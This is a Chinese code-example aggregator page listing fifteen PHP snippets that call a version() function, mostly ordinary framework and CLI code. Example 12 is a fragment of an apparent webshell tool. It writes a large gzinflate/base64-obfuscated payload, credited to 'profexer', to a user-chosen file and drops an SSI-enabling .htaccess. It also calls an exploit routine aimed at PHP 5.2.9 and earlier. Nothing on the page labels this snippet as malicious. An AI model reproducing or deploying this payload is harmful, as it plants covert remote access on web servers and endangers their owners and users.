本文整理汇总了PHP中version函数的典型用法代码示例。如果您正苦于以下问题:PHP version函数的具体用法?PHP version怎么用?PHP version使用的例子?那么恭喜您, 这里精选的函数代码示例或许可以为您提供帮助。
在下文中一共展示了version函数的15个代码示例,这些例子默认根据受欢迎程度排序。您可以为喜欢或者感觉有用的代码点赞,您的评价将有助于系统推荐出更棒的PHP代码示例。
示例1: defaultRun
public function defaultRun($request)
{
$this->data['env'] = $this->config['env'];
$this->data['domain'] = $this->config['domain'];
$this->data['mcookie'] = $_COOKIE['m'];
$this->data['is_mobile'] = $this->is_mobile;
$this->data['web_root'] = $this->config['web_root'];
$this->data['token'] = $this->getCsrfToken();
$this->data['request'] = $request;
$this->data['menu'] = new Menu();
$this->data['action'] = $this->action;
$this->data['preload_action'] = isset($request['preload_action']) ? $request['preload_action'] : "index";
if ($this->action == 'index') {
$this->action = "welcome";
$this->data['action'] = 'welcome';
}
if ($this->config['env'] == 'prod') {
require_once $this->config['zombie_root'] . "/config/version.php";
$this->data['version'] = version();
} else {
$this->data['console'] = new Console();
}
$preload_class = underscoreToClass($this->action);
if (class_exists($preload_class)) {
$this->data['preload'] = new $preload_class();
} else {
$this->view = '404';
}
}
示例2: img
/**
* Helper to create an img tag
* @param string $uri image uri
* @param array $attrs attribute key value pairs
* @param boolean $return if set to true a string is returned
* @return string
*/
function img($uri, $attrs = array(), $return = false)
{
static $mode = false;
static $version = false;
static $web_root = false;
if ($mode === false) {
$config = getZombieConfig();
$mode = $config['env'];
$web_root = $config['web_root'];
if ($web_root == '/') {
$web_root = '';
}
if ($mode == 'prod') {
require_once $config['zombie_root'] . "/config/version.php";
$version = version();
$version = $version['images'];
}
}
$html_attrs = attrsToString($attrs);
$uri = imgUri($uri, $mode, $version, $web_root);
$tag = "<img src=\"{$uri}\" {$html_attrs} />";
if ($return) {
return $tag;
} else {
echo $tag;
}
}
示例3: get_link
function get_link($version, $controller_id = '')
{
$version = version($version);
// get from function version
$controller = controller_get($controller_id);
return $version . '/' . $controller;
}
示例4: index
public function index()
{
$data = ['page' => 'guidance_and_support_2/main', 'top_class' => 'content-guidance-and-support-2', 'list' => $this->guidance_and_support_model->get_list()];
//echo'<pre>';
//print_r($data['list']);
//echo'</pre>';
$this->load->view('v' . version() . '/layouts/default', $data);
}
示例5: boot
/**
* Register any other events for your application.
*
* @param \Illuminate\Contracts\Events\Dispatcher $events
* @return void
*/
public function boot(DispatcherContract $events)
{
parent::boot($events);
\Event::listen('Illuminate\\Cache\\Events\\KeyWritten', function ($event) {
Bugsnag::leaveBreadcrumb('Cache written', 'process', ['key' => $event->key, 'value' => $event->value, 'ttl' => "{$event->minutes}mins"]);
});
Bugsnag::setAppVersion(version());
}
示例6: fire
/**
* Execute the console command.
*
* @return mixed
*/
public function fire()
{
$old = version();
$new = version(true);
$this->comment("Previous: " . $old . " New: " . $new);
if ($old !== $new) {
$this->call('bugsnag:deploy', ['--revision' => $new]);
}
}
示例7: compile
function compile($options)
{
$config = getZombieConfig();
$root = $config['zombie_root'];
if (@(include __DIR__ . "/../../../config/version.php")) {
$old_version = version();
} else {
$old_version = array('css' => 'css', 'js' => 'js', 'images' => 'images');
}
$version = uniqid();
$compile_css = false;
$compile_js = false;
$compile_images = false;
$compile_templates = false;
if (isset($options['css'])) {
$compile_css = true;
$compile_js = true;
$compile_templates = true;
}
if (isset($options['js'])) {
$compile_js = true;
$compile_css = true;
$compile_templates = true;
}
if (isset($options['images'])) {
$compile_images = true;
$compile_css = true;
$compile_templates = true;
}
if (isset($options['templates'])) {
$compile_templates = true;
}
if (isset($options['all']) || !$compile_css && !$compile_js && !$compile_images && !$compile_templates) {
$compile_css = true;
$compile_js = true;
$compile_images = true;
$compile_templates = true;
}
$css_version = $compile_css ? $version : $old_version['css'];
$js_version = $compile_js ? $version : $old_version['js'];
$images_version = $compile_images ? $version : $old_version['images'];
writeVersion($css_version, $js_version, $images_version);
if ($compile_css) {
compileCss($css_version, $old_version['css'], $images_version);
}
if ($compile_templates) {
compileTemplates();
}
if ($compile_js) {
compileJs($js_version, $old_version['js'], $css_version, $images_version);
}
if ($compile_images) {
copyImages($images_version, $old_version['images']);
}
}
示例8: sbversion
function sbversion()
{
nextBuild();
$sb = version();
$manifest = file_get_contents('blocker/manifest.json');
$manifest = (array) json_decode($manifest);
$manifest['version'] = "{$sb}";
$manifest = json_encode($manifest, JSON_PRETTY_PRINT);
$manifest = str_replace("\\/", "/", $manifest);
file_put_contents('blocker/manifest.json', $manifest);
return $sb;
}
示例9: main
function main()
{
global $argc, $argv;
$cols = 0;
$lines = 0;
$font_width = 6;
$font_height = 10;
$format = NULL;
$dither = NULL;
$gamma = $brightness = $contrast = -1.0;
$long_options = array("width:" => 'W', "height:" => 'H', "font-width:" => 'x', "font-height:" => 'y', "format:" => 'f', "dither:" => 'd', "gamma:" => 'g', "brightness:" => 'b', "contrast:" => 'c', "help" => 'h', "version" => 'v');
try {
while ($opt_and_arg = mygetopt("W:H:f:d:g:b:c:hvx:y:", array_keys($long_options))) {
$opt = $opt_and_arg[0];
$arg = $opt_and_arg[1];
if (substr($opt, 0, 2) == '--' && array_key_exists(substr($opt, strlen('--')) . ($arg !== NULL ? ':' : ''), $long_options)) {
$opt = '-' . $long_options[substr($opt, strlen('--')) . ($arg !== NULL ? ':' : '')];
}
switch ($opt) {
case '-W':
/* --width */
$cols = intval($arg);
break;
case '-H':
/* --height */
$lines = intval($arg);
break;
case '-x':
/* --width */
$font_width = intval($arg);
break;
case '-y':
/* --height */
$font_height = intval($arg);
break;
case '-f':
/* --format */
$format = $arg;
break;
case '-d':
/* --dither */
$dither = $arg;
break;
case '-g':
/* --gamma */
$gamma = floatval($arg);
break;
case '-b':
/* --brightness */
$brightness = floatval($arg);
break;
case '-c':
/* --contrast */
$contrast = floatval($arg);
break;
case '-h':
/* --help */
usage($argc, $argv);
return 0;
case '-v':
/* --version */
version();
return 0;
default:
return 1;
}
}
} catch (MygetoptException $e) {
fprintf(STDERR, "%s", $argv[0] . ": " . $e->getMessage() . "\n");
usage($argc, $argv);
return 2;
}
if ($argc != 2) {
fprintf(STDERR, "%s: wrong argument count\n", $argv[0]);
usage($argc, $argv);
return 1;
}
$cv = caca_create_canvas(0, 0);
if (!$cv) {
fprintf(STDERR, "%s: unable to initialise libcaca\n", $argv[0]);
return 1;
}
$i_str = file_get_contents($argv[$argc - 1]);
$i = $i_str ? imagecreatefromstring($i_str) : NULL;
if (!$i) {
fprintf(STDERR, "%s: unable to load %s\n", $argv[0], $argv[$argc - 1]);
return 1;
}
/* Assume a 6×10 font */
if (!$cols && !$lines) {
$cols = 60;
$lines = $cols * imagesy($i) * $font_width / imagesx($i) / $font_height;
} else {
if ($cols && !$lines) {
$lines = $cols * imagesy($i) * $font_width / imagesx($i) / $font_height;
} else {
if (!$cols && $lines) {
$cols = $lines * imagesx($i) * $font_height / imagesy($i) / $font_width;
}
}
//.........这里部分代码省略.........
示例10: version
<?php
$this->load->view('v' . version() . '/content/homepage/sub_header');
?>
<div class="content">
<?php
$this->load->view('v' . version() . '/content/homepage/updates_guidance_and_support');
?>
<?php
$this->load->view('v' . version() . '/content/homepage/highlights');
?>
<?php
$this->load->view('v' . version() . '/content/homepage/news_and_features');
?>
</div>
示例11: version
echo $top_class;
?>
">
<head>
<?php
$this->load->view('shared/head');
?>
</head>
<body>
<div class="main-container">
<div class="main-container-inner">
<?php
$this->load->view('v' . version() . '/modules/header');
?>
<?php
$this->load->view('v' . version() . '/content/' . $page);
?>
<?php
$this->load->view('v' . version() . '/modules/footer');
?>
</div>
</div>
<?php
$this->load->view('shared/body_bottom');
?>
<?php
$this->load->view('v' . version() . '/modules/body_bottom');
?>
</body>
</html>
示例12: fopen
} else {
echo "chmod done<br>";
}
if ($_POST["htaccess"] == "on") {
$fh = fopen($_POST["dir"] . "/.htaccess", "w");
fwrite($fh, $htaccess);
fclose($fh);
echo "htaccess done";
}
}
break;
case "ssish":
// code by profexer
$ssishcode = gzinflate(base64_decode("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"));
$htaccess = $htaccesses['ssi'];
if (strnatcmp(version(), "5.2.9") <= 0) {
sploent516();
}
$fh = fopen($_POST["dir"] . "/" . $_POST["file"], "w");
if (!$fh) {
echo "can`t fopen " . $_POST["dir"] . "/" . $_POST["file"] . "!";
} else {
fwrite($fh, $ssishcode);
fclose($fh);
echo $_POST["file"] . " write done<br>";
if ($_POST["htaccess"] == "on") {
$fh = fopen($_POST["dir"] . "/.htaccess", "w");
fwrite($fh, $htaccess);
fclose($fh);
echo "htaccess done";
}
示例13: insert_id
/**
* Insert ID
*
* @access public
* @return integer
*/
function insert_id()
{
$v = version($this->conn_id);
$v = $v['server'];
$table = func_num_args() > 0 ? func_get_arg(0) : null;
$column = func_num_args() > 1 ? func_get_arg(1) : null;
if ($table == null && $v >= '8.1') {
$sql = 'SELECT LASTVAL() as ins_id';
} elseif ($table != null && $column != null && $v >= '8.0') {
$sql = sprintf("SELECT pg_get_serial_sequence('%s','%s') as seq", $table, $column);
$query = $this->query($sql);
$row = $query->row();
$sql = sprintf("SELECT CURRVAL('%s') as ins_id", $row->seq);
} elseif ($table != null) {
// seq_name passed in table parameter
$sql = sprintf("SELECT CURRVAL('%s') as ins_id", $table);
} else {
return pg_last_oid($this->result_id);
}
$query = $this->query($sql);
$row = $query->row();
return $row->ins_id;
}
示例14: main
function main()
{
$args = $_SERVER['argv'];
$script = array_shift($args);
$normalize = FALSE;
$composer = FALSE;
$rem_args = array();
for ($i = 0, $m = count($args); $i < $m; $i++) {
$arg = $args[$i];
if ($arg == '-N' || $arg == '--normalize') {
$normalize = TRUE;
} else {
if ($arg == '-C' || $arg == '--composer') {
$composer = TRUE;
} else {
if (!strncmp($arg, '-', 1)) {
usage($script);
exit(1);
} else {
$rem_args[] = $arg;
}
}
}
}
$dir = getcwd();
if (count($rem_args)) {
$dir = $rem_args[0];
putenv('GIT_DIR=' . $dir . DIRECTORY_SEPARATOR . '.git');
}
// Retrieve the path to the repository's toplevel directory.
$NUL = strncasecmp(PHP_OS, 'Win', 3) ? '/dev/null' : 'NUL';
exec('git rev-parse --show-toplevel 2>' . $NUL, $output, $exitcode);
if ($exitcode != 0) {
fprintf(STDERR, "Could not determine path to .git folder.%s", PHP_EOL);
exit(1);
}
$dir = trim($output[0]);
if ($composer) {
composer($dir);
}
version($dir, $normalize);
}
示例15: site_url
<a class="list-group-item btn-primary" onclick="set_value(\'' . $thumbnail->attributes()->{'url'} . '\')">' . $title . '</a>
</div>
';
}
?>
</div>
</div>
<hr>
<div class="row">
<div class="col-md-2">
<a href="<?php
echo site_url(version(1) . '/');
?>
" class="btn btn-default glyphicon glyphicon-home"></a>
<a href="<?php
echo site_url(version(1) . '/picasa_upload');
?>
" class="btn btn-primary">Upload</a>
</div>
<div class="col-md-10">
<textarea class="form-control js-copytextarea"></textarea>
<button class="btn js-textareacopybtn"><i class="glyphicon glyphicon-copy"></i> Copy</button>
</div>
</div>
</div><!-- col-sm-9 -->
</div>
</div>
<!-- /.container -->